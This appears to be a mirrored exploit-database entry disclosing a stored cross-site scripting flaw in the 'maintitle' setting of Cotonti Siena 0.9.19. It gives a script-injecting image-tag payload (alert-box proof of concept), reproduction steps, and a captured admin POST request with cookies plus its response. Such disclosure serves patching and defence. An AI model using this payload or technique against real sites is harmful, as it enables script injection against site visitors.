Cotonti siena 0.9.19 maintitle stored crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-06-16 | Type : webapps | Platform : php
This exploit / vulnerability Cotonti siena 0.9.19 maintitle stored crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Date: 2021-15-06
# Exploit Author: Fatih İLGİN
# Vendor Homepage: cotonti.com
# Vulnerable Software: https://www.cotonti.com/download/siena_0919
# Affected Version: 0.9.19
# Tested on: Windows 10

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: maintitle
# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>

# Description

1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param
3) Then click Update button
4) In the end, Go to home page then shown triggered vulnerability


# Proof of Concepts

Request;

POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
Host: vulnerableapplication.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 440
Origin: https://vulnerableapplication.com
Connection: close
Referer:
https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
Cookie:
__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;
__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;
__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;
PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3

&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D


Response;

HTTP/1.1 200 OK
Date: Tue, 15 Jun 2021 16:07:59 GMT
Server: Apache
Expires: Mon, Apr 01 1974 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
Pragma: no-cache
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
Vary: Accept-Encoding
X-Robots-Tag: noindex,nofollow
Content-Length: 4366
Connection: close
Content-Type: text/html; charset=UTF-8

<h1 class="body"><a href="admin.php" title="Administration
panel">Administration panel</a> / <a href="admin.php?m=config"
title="Configuration">Configuration</a> / <a
href="admin.php?m=config&n=edit&o=core&p=title" title="Titles
and Metas">Titles and Metas</a></h1>

<div id="main" class="body clear">
<h2>Configuration</h2>
<div class="done">
<h4>Done</h4>
<ul>
<li>Updated</li>
</ul>
</div>